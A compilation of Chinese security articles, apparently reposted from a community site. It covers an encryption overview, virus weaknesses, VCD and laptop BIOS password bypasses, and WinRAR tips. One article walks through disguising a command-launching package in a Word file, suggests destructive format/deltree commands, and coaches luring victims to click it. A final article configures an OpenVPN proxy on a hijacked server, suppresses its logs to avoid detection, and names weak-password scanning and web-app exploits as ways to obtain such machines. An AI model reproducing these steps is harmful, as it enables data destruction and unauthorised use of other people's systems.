随着计算机联网的逐步实现，计算机信息的保密问题显得越来越重要。数据保密变换，或密码技术，是对计算机信息进行保护的最实用和最可靠的方法，本文拟对信息加密技术作一简要介绍。

一、信息加密概述

密码学是一门古老而深奥的学科，它对一般人来说是莫生的，因为长期以来，它只在很少的范围内，如军事、外交、情报等部门使用。计算机密码学是研究计算机信息加密、解密及其变换的科学，是数学和计算机的交义学科，也是一门新兴的学科。随着计算机网络和计算机通讯技术的发展，计算机密码学得到前所未有的重视并迅速普及和发展起来。在国外，它已成为计算机安全主要的研究方向，也是计算机安全课程教学中的主要内容。

密码是实现秘密通讯的主要手段，是隐蔽语言、文字、图象的特种符号。凡是用特种符号按照通讯双方约定的方法把电文的原形隐蔽起来，不为第三者所识别的通讯方式称为密码通讯。在计算机通讯中，采用密码技术将信息隐蔽起来，再将隐蔽后的信息传输出去，使信息在传输过程中即使被窃取或载获，窃取者也不能了解信息的内容，从而保证信息传输的安全。

任何一个加密系统至少包括下面四个组成部分：

（1）、未加密的报文，也称明文。

（2）、加密后的报文，也称密文。

（3）、加密解密设备或算法。

（4）、加密解密的密钥。

发送方用加密密钥，通过加密设备或算法，将信息加密后发送出去。接收方在收到密文后，用解密密钥将密文解密，恢复为明文。如果传输中有人窃取，他只能得到无法理解的密文，从而对信息起到保密作用。

二、密码的分类

从不同的角度根据不同的标准，可以把密码分成若干类。

（一）按应用技术或历史发展阶段划分：

1、手工密码。以手工完成加密作业，或者以简单器具辅助操作的密码，叫作手工密码。第一次世界大战前主要是这种作业形式。

2、机械密码。以机械密码机或电动密码机来完成加解密作业的密码，叫作机械密码。这种密码从第一次世界大战出现到第二次世界大战中得到普遍应用。

3、电子机内乱密码。通过电子电路，以严格的程序进行逻辑运算，以少量制乱元素生产大量的加密乱数，因为其制乱是在加解密过程中完成的而不需预先制作，所以称为电子机内乱密码。从五十年代末期出现到七十年代广泛应用。

4、计算机密码，是以计算机软件编程进行算法加密为特点，适用于计算机数据保护和网络通讯等广泛用途的密码。

（二）按保密程度划分：　　

1、理论上保密的密码。不管获取多少密文和有多大的计算能力，对明文始终不能得到唯一解的密码，叫作理论上保密的密码。也叫理论不可破的密码。如客观随机一次一密的密码就属于这种。

2、实际上保密的密码。在理论上可破，但在现有客观条件下，无法通过计算来确定唯一解的密码，叫作实际上保密的密码。

3、不保密的密码。在获取一定数量的密文后可以得到唯一解的密码，叫作不保密密码。如早期单表代替密码，后来的多表代替密码，以及明文加少量密钥等密码，现在都成为不保密的密码。

（三）、按密钥方式划分：

1、对称式密码。收发双方使用相同密钥的密码，叫作对称式密码。传统的密码都属此类。

2、非对称式密码。收发双方使用不同密钥的密码，叫作非对称式密码。如现代密码中的公共密钥密码就属此类。

（四）按明文形态：

1、模拟型密码。用以加密模拟信息。如对动态范围之内，连续变化的语音信号加密的密码，叫作模拟式密码。

2、数字型密码。用于加密数字信息。对两个离散电平构成0、1二进制关系的电报信息加密的密码叫作数字型密码。

（五）按编制原理划分：

可分为移位、代替和置换三种以及它们的组合形式。古今中外的密码，不论其形态多么繁杂，变化多么巧妙，都是按照这三种基本原理编制出来的。移位、代替和置换这三种原理在密码编制和使用中相互结合，灵活应用。

三、近代加密技术

（一）、数据加密标准

数据加密标准（DES）是美国经长时间征集和筛选后，于1977年由美国国家标准局颁布的一种加密算法。它主要用于民用敏感信息的加密，后来被国际标准化组织接受作为国际标准。DES主要采用替换和移位的方法加密。它用56位密钥对64位二进制数据块进行加密，每次加密可对64位的输入数据进行16轮编码，经一系列替换和移位后，输入的64位原始数据转换成完全不同的64位输出数据。DES算法仅使用最大为64位的标准算术和逻辑运算，运算速度快，密钥生产容易，适合于在当前大多数计算机上用软件方法实现，同时也适合于在专用芯片上实现。

DES主要的应用范围有：

（1）计算机网络通信：对计算机网络通信中的数据提供保护是DES的一项重要应用。但这些被保护的数据一般只限于民用敏感信息，即不在政府确定的保密范围之内的信息。

（2）电子资金传送系统：采用DES的方法加密电子资金传送系统中的信息，可准确、快速地传送数据，并可较好地解决信息安全的问题。

（3）保护用户文件：用户可自选密钥对重要文件加密，防止未授权用户窃密。

（4）用户识别：DES还可用于计算机用户识别系统中。

DES是一种世界公认的较好的加密算法。自它问世20多年来，成为密码界研究的重点，经受住了许多科学家的研究和破译，在民用密码领域得到了广泛的应用。它曾为全球贸易、金融等非官方部门提供了可靠的通信安全保障。但是任何加密算法都不可能是十全十美的。它的缺点是密钥太短（56位），影响了它的保密强度。此外，由于DES算法完全公开，其安全性完全依赖于对密钥的保护，必须有可靠的信道来分发密钥。如采用信使递送密钥等。因此，它不适合在网络环境下单独使用。

针对它密钥短的问题，科学家又研制了80位的密钥，以及在DES的基础上采用三重DES和双密钥加密的方法。即用两个56位的密钥K1、K2，发送方用K1加密，K2解密，再使用K1加密。接收方则使用K1解密，K2加密，再使用K1解密，其效果相当于将密钥长度加倍。

（二）国际数据加密算法

国际数据加密算法IDEA是瑞士的著名学者提出的。它在1990年正式公布并在以后得到增强。这种算法是在DES算法的基础上发展出来的，类似于三重DES。发展IDEA也是因为感到DES具有密钥太短等缺点，已经过时。IDEA的密钥为128位，这么长的密钥在今后若干年内应该是安全的。

类似于DES，IDEA算法也是一种数据块加密算法，它设计了一系列加密轮次，每轮加密都使用从完整的加密密钥中生成的一个子密钥。与DES的不同处在于，它采用软件实现和采用硬件实现同样快速。

由于IDEA是在美国之外提出并发展起来的，避开了美国法律上对加密技术的诸多限制，因此，有关IDEA算法和实现技术的书籍都可以自由出版和交流，可极大地促进IDEA的发展和完善。但由于该算法出现的时间不长，针对它的攻击也还不多，还未经过较长时间的考验。因此，尚不能判断出它的优势和缺陷。

（三）clipper加密芯片

密码虽然可为私人提供信息保密服务，但是它首先是维护国家利益的工具。正是基于这个出发点，考虑到DES算法公开后带来的种种问题，美国国家保密局（NSA）从1985年起开始着手制定新的商用数据加密标准，以取代DES。

1990年开始试用，1993年正式使用，主要用于通信交换系统中电话、传真和计算机通信信息的安全保护。

新的数据加密标准完全改变了过去的政策，密码算法不再公开，对用户提供加密芯片（clipper）和硬件设备。新算法的安全性远高于DES，其密钥量比DES多1000多万倍。据估算，穷举破译至少需要10亿年。为确保安全，clipper芯片由一个公司制造裸片，再由另一公司编程后方可使用。

由于完全是官方的封闭控制，该算法除可提供高强度的密码报密外，还可对保密通信进行监听，以防止不法分子利用保密通信进行非法活动，但这种监听是在法律允许的范围内进行的。官方控制也成为美国民间反对该方案的一个重要原因。

Clipper芯片主要用于商业活动的计算机通信网。NSA同时在着手进行政府和军事通信网中数据加密芯片的研究，并作为clipper的换代产品。它除了具有clipper的全部功能外，还将实现美国数字签名标准（DSS）和保密的哈稀函数标准以及用纯噪声源产生随机数据的算法等。

（四）公开密钥密码体制

传统的加密方法是加密、解密使用同样的密钥，由发送者和接收者分别保存，在加密和解密时使用，采用这种方法的主要问题是密钥的生成、注入、存储、管理、分发等很复杂，特别是随着用户的增加，密钥的需求量成倍增加。在网络通信中，大量密钥的分配是一个难以解决的问题。

例如，若系统中有n个用户，其中每两个用户之间需要建立密码通信，则系统中每个用户须掌握(n-1)/2个密钥，而系统中所需的密钥总数为n*(n-1)/2 个。对10个用户的情况，每个用户必须有9个密钥，系统中密钥的总数为45个。对100个用户来说，每个用户必须有99个密钥，系统中密钥的总数为4950个。这还仅考虑用户之间的通信只使用一种会话密钥的情况。如此庞大数量的密钥生成、管理、分发确实是一个难处理的问题。

本世纪70年代，美国斯坦福大学的两名学者迪菲和赫尔曼提出了一种新的加密方法--公开密钥加密队PKE方法。与传统的加密方法不同，该技术采用两个不同的密钥来对信息加密和解密，它也称为"非对称式加密方法。每个用户有一个对外公开的加密算法E和对外保密的解密算法D，

它们须满足条件：

（1）D是E的逆，即D[E（X）]=X；

（2）E和D都容易计算。

（3）由E出发去求解D十分困难。

从上述条件可看出，公开密钥密码体制下，加密密钥不等于解密密钥。加密密钥可对外公开，使任何用户都可将传送给此用户的信息用公开密钥加密发送，而该用户唯一保存的私人密钥是保密的，也只有它能将密文复原、解密。虽然解密密钥理论上可由加密密钥推算出来，但这种算法设计在实际上是不可能的，或者虽然能够推算出，但要花费很长的时间而成为不可行的。所以将加密密钥公开也不会危害密钥的安全。

数学上的单向陷门函数的特点是一个方向求值很容易，但其逆向计算却很困难。许多形式为Y=f（x）的函数，对于给定的自变量x值，很容易计算出函数Y的值；而由给定的Y值，在很多情况下依照函数关系f(x)计算x值十分困难。例如，两个大素数p和q相乘得到乘积n比较容易计算，但从它们的乘积n分解为两个大素数p和q则十分困难。如果n为足够大，当前的算法不可能在有效的时间内实现。

正是基于这种理论，1978年出现了著名的RSA算法。这种算法为公用网络上信息的加密和鉴别提供了一种基本的方法。它通常是先生成一对RSA 密钥，其中之一是保密密钥，由用户保存；另一个为公开密钥，可对外公开，甚至可在网络服务器中注册。为提高保密强度，RSA密钥至少为500位长，一般推荐使用1024位。这就使加密的计算量很大。为减少计算量，在传送信息时，常采用传统加密方法与公开密钥加密方法相结合的方式，即信息采用改进的DES或IDEA对话密钥加密，然后使用RSA密钥加密对话密钥和信息摘要。对方收到信息后，用不同的密钥解密并可核对信息摘要。

RSA算法的加密密钥和加密算法分开，使得密钥分配更为方便。它特别符合计算机网络环境。对于网上的大量用户，可以将加密密钥用电话簿的方式印出。如果某用户想与另一用户进行保密通信，只需从公钥簿上查出对方的加密密钥，用它对所传送的信息加密发出即可。对方收到信息后，用仅为自己所知的解密密钥将信息脱密，了解报文的内容。由此可看出，RSA算法解决了大量网络用户密钥管理的难题。

RSA并不能替代DES，它们的优缺点正好互补。 RSA的密钥很长，加密速度慢，而采用DES，正好弥补了RSA的缺点。即DES用于明文加密，RSA用于DES密钥的加密。由于DES加密速度快，适合加密较长的报文；而RSA可解决DES密钥分配的问题。美国的保密增强邮件（PEM）就是采用了RSA 和DES结合的方法，目前已成为E-MAIL保密通信标准。

四、局域网通信安全措施

对于局域网通信，可采用以下两种具体措施进行加密传输。这些措施的加、解密功能都可以采用上述算法实现：

（1）链路加密

链路加密是传输数据仅在物理层前的数据链路层进行加密。接收方是传送路径上的各台节点机，信息在每台节点机内都要被解密和再加密，依次进行，直至到达目的地。

使用链路加密装置能为某链路上的所有报文提供传输服务。即经过一台节点机的所有网络信息传输均需加、解密，每一个经过的节点都必须有密码装置，以便解密、加密报文。如果报文仅在一部分链路上加密而在另一部分链路上不加密，则相当于未加密，仍然是不安全的。与链路加密类似的节点加密方法，是在节点处采用一个与节点机相连的密码装置（被保护的外围设备）,密文在该装置中被解密并被重新加密，明文不通过节点机，避免了链路加密关节点处易受攻击的缺点。

（2）端--端加密

端--端加密是为数据从一端传送到另一端提供的加密方式。数据在发送端被加密，在最终目的地（接收端）解密，中间节点处不以明文的形式出现。

采用端--端加密是在应用层完成，即传输前的高层中完成。除报头外的的报文均以密文的形式贯穿于全部传输过程。只是在发送端和最终端才有加、解密设备，而在中间任何节点报文均不解密，因此，不需要有密码设备。同链路加密相比，可减少密码设备的数量。另一方面，信息是由报头和报文组成的，报文为要传送的信息，报头为路由选择信息。由于网络传输中要涉及到路由选择，在链路加密时，报文和报头两者均须加密。而在端--端加密时，由于通道上的每一个中间节点虽不对报文解密，但为将报文传送到目的地，必须检查路由选择信息，因此，只能加密报文，而不能对报头加密。这样就容易被某些通信分析发觉，而从中获取某些敏感信息。

（3）加密传输方式的比较

数据保密变换使数据通信更安全，但不能保证在传输过程中绝对不会泄密。因为在传输过程中，还有泄密的隐患。

采用链路加密方式，从起点到终点，要经过许多中间节点，在每个节点地均要暴露明文（节点加密方法除外），如果链路上的某一节点安全防护比较薄弱，那么按照木桶原理（木桶水量是由最低一块木板决定），虽然采取了加密措施，但整个链路的安全只相当于最薄弱的节点处的安全状况。

采用端--端加密方式，只是发送方加密报文，接收方解密报文，中间节点不必加、解密，也就不需要密码装置。此外，加密可采用软件实现，使用起来很方便。在端--端加密方式下，每对用户之间都存在一条虚拟的保密信道，每对用户应共享密钥（传统密码保密体制，非公钥体制下），所需的密钥总数等于用户对的数目。对于几个用户，若两两通信，共需密钥n*(n-1)/2种，每个用户需(n-1)种。这个数目将随网上通信用户的增加而增加。为安全起见，每隔一段时间还要更换密钥，有时甚至只能使用一次密钥，密钥的用量很大。

链路加密，每条物理链路上，不管用户多少，可使用一种密钥。在极限情况下，每个节点都与另外一个单独的节点相连，密钥的数目也只是n*(n-1)/2 种。这里n是节点数而非用户数，一个节点一般有多个用户。

从身份认证的角度看，链路加密只能认证节点，而不是用户。使用节点A密钥的报文仅保证它来自节点A。报文可能来自A的任何用户，也可能来自另一个路过节点A的用户。因此链路加密不能提供用户鉴别。端--端加密对用户是可见的，可以看到加密后的结果，起点、终点很明确，可以进行用户认证。

总之，链路加密对用户来说比较容易，使用的密钥较少，而端--端加密比较灵活，用户可见。对链路加密中各节点安全状况不放心的用户也可使用端--端加密方式。

看透本质抓出弱点 深入了解电脑病毒

看透本质抓出弱点　深入了解电脑病毒

作者：lvvl　来源：赛迪网安全社区

电脑病毒是一些能够自我复制的程序段，它能附在应用程序或系统文件的可执行部分。在宿主程序执行的某些阶段，它能够获得执行控制权。按病毒传染机理可分为两大类：一类是系统引导型，它感染系统引导时的程序（系统引导扇区、操作系统的某些模 块、设备驱动程序等）；

另一类是文件型，它感染可执行的程序文件（即应用程序，含COM文件、EXE文件或覆盖文件等）。

透过各种病毒的分析，可以发现病毒有三个本质弱点：

（1）病毒的宿主目标必须是电脑系统的可执行程序，也就是说它们只能感染系统引导程序或应用程序。

（2）病毒的感染总是以某种方式改变被感染的程序段，如果附在现存程序上，它会改变程序的开头、结尾或程序中间的某些部分，如果它隐藏在磁盘的某些区，它会更改这些区的内容。

（3）如果病毒要存活、传播， 那么它的程序代码必须能够被执行，即病毒必须把自身或一部分定位于宿主程序的特殊位置，以便获得控制权。

实际上，现有PC病毒都是通过改变宿主程序的第一条执行的指令，达到先于宿主程序执行的目的。对于COM 文件，病毒替换它的第一条指令（因为COM 文件入口地址固定为CS:100H）；对于EXE文件，病毒改变入口指针（在文件头）；对于中断服务程序，也类似地改变它的中断向量。

因此，病毒破坏了被感染程序的数据真实性，准确地说是破坏了被感染程序第一条被执行指令的真实性。所以，对应用程序的校验只要针对第一条执行的指令和附近的数据，既可保证准确性，又减少检测时间。

亲身实践编制Word病毒理解恶意宏作用

作者：lvvl　来源：赛迪网安全社区

第一步：启动Word 2003（同样适合Word 2000/XP），单击“插入→对象”命令，在弹出的“对象”窗口中单击“对象类型”列表的“包”项，单击“确定”按钮。

第二步：在弹出的“对象包装程序”对话框窗口单击“编辑→命令行”菜单，在弹出的“命令行”对话框中输入“regedit”，然后单击“确定”按钮。

小提示

如果想更坏一点，试试Format、Deltree命令，不过一切后果自负呀！

第三步：然后在“对象包装程序”窗口中单击“插入图标”按钮，为该命令行选个比较通用的图标（如一个常见的文档图标），然后单击“文件→更新”，可以立刻在Word文件看到显示效果。关闭“对象包装程序”窗口，这时候文档的相关位置出现了一个和相关命令关联的图标。在图标旁边加点鼓动性的文字，尽量让浏览者看到后用鼠标“试试”。

第四步：至此，秘密小“病毒”就做成功了，想办法发送出去试试效果吧。当用户双击它时，将会自动打开“注册表编辑器”。

其实这个根本不算是个病毒，要算也只能算最低级的简单“小病毒”。真正的时候，我们可以利用Office中的宏指令（如FileOpen、FileSave、FilePrint等命令）相关联，还内嵌使系统瘫痪、使每一个Word文件感染的代码，并且可以自动保存为模板文件，只要打开染毒的Word文件，随后所有的Word文件都会被感染。

小提示

如果我们在上述的命令行中加上format或者deltree之类的恶意代码，那用户双击后其后果就可想而知了！

第五步：有矛比有盾，如何防范藏在暗里的病毒呢？很简单，禁止Word执行宏指令就可以了。打开Word，单击“工具→宏→安全性”菜单，在弹出的“安全性”窗口中将其安全性设为“高”，从此以后末经系统签署的宏指令将会被Word禁止执行，安全性也就上了一个台阶。

小提示

单击“开始→运行”，输入“winword.exe /m DisableAutoMacros”也可将禁止Word的自动宏。

第六步：如果你的电脑已经中了可恶的宏病毒怎么办呢？别着急，一步一步来。单击“工具→宏”菜单，进入宏“管理器”，单击“宏方案项”，在“宏有效范围”下拉列表框中打开要检查的模板文档。这时在上面的列表框中就会出现该文档模板中所含的宏，将不明来源的自动执行宏删除。

第七步：然后一定用最新病毒库的杀毒软件对系统进行查杀，将系统内的病毒彻底干掉！

小提示

由于宏病毒的变种千变万化，防范和清除病毒的方法也不断变化，因此大家在了解宏病毒的同时，也要关注除病毒的方法，做好防范工作，不然，DOC病毒还真会黑你没商量呢。

另类破解 用超级解霸解决加了密的VCD

另类破解　用超级解霸解决加了密的VCD

作者：smtk　来源：赛迪网安全社区

这种VCD光盘都不能在电脑CD光驱上看，通过设备管理器进入也不能显示任何文件。就算能看也只有一面可以。下面我就介绍一种VCD加密技术和破解方法。

人工光盘坏道是目前最新最常用的加密方法，原理是该VCD带防盗圈，这个圈的作用是在光头读盘到防盗圈处时是个坏道，从物理上让光驱读不过去，你会发现光盘可以显示容量，但打开目录却没有任何文件，市面上的最新VCD都是采用这种加密方法。象我想拷的正版神勇铁金刚，无间道3就是这种方法。

安装豪杰解霸3000零售版或者豪杰超级解霸8.0完全安装。其实任何版本的豪杰解霸可以，其实只要其中的一个工具“MP3数字CD抓轨”，打开之，放入加密光盘。打开软件，找到VCD所在的光驱，选择轨道中最大的那个文件，在确定你要保存文件的路径。其他的选择就自己看着办吧。点击“开始读取”，稍等几分钟。

完毕，打开你保存的文件目录，会发现有个后缀名为.RAW的文件，那就是你要看的有图像、有声音的VCD了，用Windows Media Player看吧！

破解进阶之教你打开丢失密码的笔记本

作者：lvvl　来源：赛迪网安全社区

对于笔记本电脑，最好不要轻易的设置密码，因为笔记本电脑的开机密码并不是象PC机那样存放在CMOS电路中可以通过放电清除的，目前较新的笔记本都是将密码保存在主板的几块逻辑电路中，我们个人是无法破解的（此系列电脑，密码可加至三层，每一层都针对不同的设备加密，如果设置的密码丢失的话，电脑可就是摆设了），要破解的话得换，可能得花不少钱。

但是对于型号较老的笔记本电脑，你可以试试下面的方法，也许可以解除笔记本的开机密码：一是改变机器的硬件配置，比如把硬盘取下来，再重新启动有可能会自动进入Setup程序，并清除开机密码。二是可以试试在主板上找一个芯片，这个芯片俗称818芯片，一般是“MC146818"有24个引脚，短接第12脚和第24脚1秒钟，或者找一个标有” MC14069"的芯片，把其第14脚对地短接一下，也许可以达到清除密码的目的。

对于东芝笔记本电脑如果你忘记了你的口令，可以使用口令服务软盘来解决(口令服务软盘在你每次设置或修改开机口令时生成，请妥善保存)。具体步骤如下：在驱动器中插入口令服务软盘。按下Enter,出现下列消息：

Set Pass Again?(Y/N)

按Y运行TSETUP程序，设置新口令。按N重新启动电脑。

注意：口令服务软盘必须被插入驱动器中，否则显示将返回到Password=。如果已经在驱动器中插入了软盘，该消息仍然出现，口令服务软盘可能有问题。此外在使用口令服务软盘时要注意以下两个问题：如果BIOS引导优先级设置为硬盘或光驱，按复位按钮，保持F键按下以确保从软盘驱动器引导。如果电脑处在恢复方式，打开电源时口令服务软盘将不起作用。这时，也请先按复位按钮。

对于型号较老的东芝笔记本电脑，其BIOS口令保护存在一个“后门”。你可以试试下面介绍的办法，也许能绕过东芝笔记本BIOS口令限制，而无需输入任何密码认证。准备好一张格式化好的空软盘，另外一台计算机，一种二进制编辑软件(比如Norton DiskEdit或者UtralEdit 32等)。具体的步骤如下：

1.启动另一台电脑，打开二进制编辑器，将软盘插入驱动器，修改软盘第一扇区的前5个字节，使其变成：4B 45 59 00 00，注意引导扇区是第0扇区，不要改错了。然后保存修改，你现在就有了一张钥匙盘了。将这张软盘插入笔记本电脑的软驱中，按reset键重启动，当提示你输入口令时，直接按回车，系统提示你是否要再次设置口令。按"Y"，回车。然后你就看到了BIOS的设置界面，可以重新设定一个新口令了。

2.笔记本电脑是TOSHIBA，可以方便的借助电脑本身的打印口来清除密码。

联接为：1脚接5脚和10脚，2脚接11脚，3接17，其它类推。

1- 5-10

2 -11

3 -17

4 -12

6 -16

7- 13

8- 14

9 -15

此表为电脑主板上接口。外接的接口与此相反，请注意。

如果上面的介绍的方法都不起作用，就只有送笔记本电脑专业维修点用特殊方法处理，倘若过了保修期，在价格上你只有任人宰割了。因此一般没有特殊原因，笔记本电脑还是不要随意设置开机口令。为保证数据安全，建议大家装WIN2000/NT或WINXP操作系统，并使用NTFS格式分区，这样其实比单纯设置开机口令，更能保证系统安装。现在有些笔记本电脑还提供了指纹开机识别系统等安装措施，取代传统的BIOS密码保护。

另类加密 用WinRAR打造安全加密文件

作者：lvvl　来源：赛迪网安全社区

常用WinRAR来压缩各类文件的朋友是否知道，除了压缩文件，WinRAR还完全可以当作一个加密软件来使用，只要在压缩文件的时候设置一个密码就可以达到保护数据的目的了。不过也正因为如此，专门针对WinRAR密码的破解软件也是遍地开花。密码的长短对于现在的破解软件来说，已经不是最大的障碍了。那么，怎样才可以让WinRAR加密的文件牢不可破呢？

我们知道，现在的破解软件在破解加密文件密码的时候总要指定一个Encrypted File（目标文件），然后根据字典使用穷举法来破解密码。但是如果我们将多个需要加密的文件压缩在一起，然后为每一个文件设置不同的密码，那破解软件就无可奈何了……假设现在有一个重要文件，需要给它加密保存，我们就可以这样做：

1.按照常规的方法把它压缩并且设置一个密码；

2.准备一个其他文件（当然这个文件小一点最好了，因为我们只是利用它来迷惑破解软件而已）；

3.在WinRAR的工作窗口中打开我们第一步已经压缩好的加密文件，在“命令”菜单中选择“添加文件到压缩包”菜单选项；

4.在弹出的“请选择要添加的文件”对话框中选择我们准备的“其他文件”，点击“确定”按钮后回到“档案文件名字和参数”对话框；

5.在“高级”选项卡标签中点击“设置密码”按钮设置一个不同的密码，然后开始压缩即可。

好了，现在两个密码已经设置完成了（如果添加了多个文件，也可以给每个文件设置不同的密码，如果你担心自己会忘记，只设两个密码也可以达到目的）。我们可以试着打开压缩文件看看，是不是每一个文件名的右上角都有一个表示加密的星号呢（如图），但是此星号可不等于彼星号哦，打开其中不同的文件都需要相对应的密码，使用破解软件是得不到正确密码的。但是，如果大家自己也忘记了密码，那就……所以在设置这样的密码的时候，最好有自己便于记忆的规律可循。实在不行，我们可以使用第三方软件，比如我的密码(MyPassWord) V3.10来帮助记忆密码。



这种方法对用WinZip加密的文件同样适用。

在Linux下建立VPN服务器来做加密代理

在Linux下建立VPN服务器来做加密代理

作者：baoz　来源：赛迪网安全社区

【编者提示：本文内容仅供参考，请勿用于不当之处！】

一、背景

对VPN的分类什么的有个大概的了解，知道是个大概怎么回事，如果不大清楚的朋友可以google一下。本文就不对这些内容进行具体的介绍了。

目标系统：Red Hat Linux 9默认安装。

二、需求

说白了就是用肉鸡做加密代理。

1：对系统尽可能小的改变，包括添加文件和系统日志，因为我们用的是肉鸡。

2：是client-->server的模式，而不是net-net的模式，浏览网页而已。

3：无论server还是client都要配置方便，简单好用，我们要的是快速。

三、选型

1：*swan

A：ipsec vpn的代表，默认端口tcp/udp 500。

B：优点：加密强，对网络游戏什么的支持好(我们用不上)。

C：缺点：部署麻烦，配置麻烦，关键是他的nat-t，就是nat穿越功能需要打内核补丁，重新编译内核才行，这事在肉鸡做不得。大概的说说swan系列吧，最开始是freeswan，然后大概在2004年停止开发，衍生出openswan和strongswan两个分支，openswan发展的不错，strongswan连个rpm包都没。swan系列分两块，一个是用户空间程序，一个是内核空间程序。内核空间的包括模块和补丁，大概就那么回事。就是说，要做到nat-t，就需要用户空间程序，lkm和内核补丁，需要重新编译内核，这个我们在肉鸡没法做。还有他要用root运行。

2：pptpd

A：pptp vpn的典型代表，默认端口tcp 1723。

B：优点：Windows带了他的client，安装也方便，就几个rpm，配置也不难。

C：缺点：一拨进去他就会改缺省网关，很烦，要么拨进去自己route add/delete几下改改，一直别断开，看个网站犯得着那么麻烦吗。

3：openvpn

A：SSL VPN的典型代表，默认端口tcp/udp 1194。

B：优点：简单好装，一个rpm搞定，要压缩的话多一个lzo的rpm包。配置也是简单的很，就生成一个static.key，还可以chroot，并且可以以nobody运行，肉鸡的安全也是很重要的，保管不好就被抢了，不过chroot就没必要了，有兴趣的朋友可以自己搞搞。一下把要的东西都丢到一个地方然后加上配置文件就差不多了，再改改启动脚本。

还有就是拨进VPN之后，他不会改你默认网关，免去了折腾的烦恼，我们可以把sf.net的地址加到静态路由去。

在server那边只需要开一个udp or tcp端口就可以了，不怎么需要去动别人的iptables。

C：缺点：除了要额外装一个client之外，相对我们的需求来说基本没什么缺点了。

四、开始

1：安装client and server程序

[root@RH9 root]# rpm -ivh lzo-1.08-2_2.RHL9.at.i386.rpm

warning： lzo-1.08-2_2.RHL9.at.i386.rpm： V3 DSA signatur E： NOKEY, key ID 66534c2b

Preparing... ########################################### [100%]

1：lzo ########################################### [100%]

[root@RH9 root]# rpm -ivh openvpn-2.0.7-1.rh9.rf.i386.rpm

warning： openvpn-2.0.7-1.rh9.rf.i386.rpm： V3 DSA signatur E： NOKEY, key ID 6b8d79e6

Preparing... ########################################### [100%]

1：openvpn ########################################### [100%]

2：服务端配置

[root@RH9 root]# cat > /etc/openvpn/server.conf

dev tun

ifconfig 10.8.0.1 10.8.0.2

secret static.key ;

user nobody ;

group nobody

port 3389 ;

comp-lzo ;

;keep alive

keepalive 10 60 ;

ping-timer-rem

persist-tun

persist-key

;no-log ;

verb 0

status /dev/null

log /dev/null

log-append /dev/null

server配置完毕。

3：客户端配置

安装openvpn-2.0.9-gui-1.0.3-install.exe，然后打开“开始”--“程序”--“openvpn”--“Generate a static OpenVPN key”，这会在C:\Program Files\OpenVPN\config下生成一个叫key.txt的文件，把他重命名为static.key。

然后把这个文件复制到linux肉鸡的/etc/openvpn/static.key去，最后在C:\Program Files\OpenVPN\config目录下创建一个叫client.ovpn的文件，内容如下

remote 肉鸡的IP

dev tun

ifconfig 10.8.0.2 10.8.0.1

secret static.key

port 3389

verb 3

comp-lzo

keepalive 10 60

ping-timer-rem

persist-tun

persist-key

client配置完毕。

注意，无论是服务端还是客户端的IP，都不要和系统有的IP段冲突，另外改了端口需要在client and server都改一致。

4：启动并连接

A：启动服务端

[root@RH9 root]# /etc/init.d/openvpn start

Starting openvpn: [ OK ]

这个时候理论上会发现多了一个接口，等会我们要收拾这个口子。

[root@RH9 root]# ifconfig tun0

tun0 Link encap:Point-to-Point Protocol

inet addr:10.8.0.1 P-t-P:10.8.0.2 Mask:255.255.255.255

UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:100

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

[root@RH9 root]# netstat -an | grep 3389

udp 0 0 0.0.0.0:3389 0.0.0.0:*

这个时候理论上会起了一个3389的udp口，如果这两个事情都有了，那就好了，一般除了RP有WT之外，这里基本都不怎么可能出现错误。

如果有错误的话，就把上面的

verb 0

status /dev/null

log /dev/null

log-append /dev/null

改成

verb 9

status /usr/lib/0

log /usr/lib/1

log-append /usr/lib/1

然后重新启动openvpn服务并查看日志，注意，这个时候messages会有日志，调试完毕记得删除/usr/lib/0 /usr/lib/1。

B：启动客户端

“开始”--“程序”--“openvpn”--“OpenVPN GUI”，连接服务端，点右下角红色的图标--connect。图标变绿，就是成功连接并分配到地址了，注意让你的防火墙通过。如果没变绿色，从那个图标那view log，如果发现不到问题，就把client的配置文件的verb设置为9，重新连接，再看日志，再google。

C：检查连接：

在client里看到有这么个信息

Ethernet adapter 本地连接 4：

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 10.8.0.2

Subnet Mask . . . . . . . . . . . : 255.255.255.252

Default Gateway . . . . . . . . . :

C:\>ping 10.8.0.1

Pinging 10.8.0.1 with 32 bytes of data:

Reply from 10.8.0.1: bytes=32 time=7ms TTL=64

连接没有问题，这个时候就根据个人的喜好，是改默认网关还是只根据目的地址route add一下了，如果肉鸡速度快的话改默认网关吧。

C:\>route delete 0.0.0.0

C:\>route add 0.0.0.0 mask 0.0.0.0 10.8.0.1 -->注意，是vpn server的tun0的地址。

如果DNS服务器不在内网的话，自己再route add一次DNS的地址就OK，如果想长期生效，可在route add语句最后加-p参数。

D：服务端打开转发

做个nat，但注意一下eth0需要是可以去外网的接口，否则等会数据走不出去，如果肉鸡是单接口的话就不需要担心。

[root@RH9 root]# iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE

再看看转发开了没

[root@RH9 root]# sysctl -a | grep net.ipv4.ip_forward

net.ipv4.ip_forward = 0

我们把他打开

[root@RH9 root]# sysctl -w net.ipv4.ip_forward=1

5：找错

VPN一般出问题就只有三个地方，client的防火墙，server的防火墙，和转发开关是否打开，所以我们在服务端抓抓包就完全可以找到出问题的地方。ipsec pptp都可以这么找错。

A：在server的tun0口抓一切包，以检测client-->server是否连通，当然，一定是连通的，否则那图标就不会是绿色了。

[root@RH9 root]# tcpdump -n -i tun0

tcpdump: listening on tun0

B：在server的eth0口抓目标地址包，以检测转发是否有问题。

[root@RH9 root]# tcpdump -n -i eth0 dst host baoz.net

tcpdump: listening on eth0

C：

这个时候我们telnet一下baoz.net看看

C:\>telnet baoz.net

两边都看到有包就对了。如果有一边看不到包，就自己折腾一下好了。看看一路过来是不是都没搞错。

五、肉鸡中的隐藏

1：肉鸡哪来？

A：web app漏洞，awstat什么的，没事就留意一下milw0rm.com的webapp部分，出新漏洞了就google hacking一把。

B：ssh or telnet弱口令，没事就找几个A BLOCK扫扫看。推荐xfocus冰河的X-Scan。

C：0day exp ? 这个我就不清楚了。

D：蜜罐，上面三种情况都可能是蜜罐，不过没关系，就做个代理上上网嘛，蜜罐就蜜罐了，只要网速快就行。

2：日志

日志的处理上面在服务端配置部分已经提到了的，小心处理就是。

3：进程、端口和连接

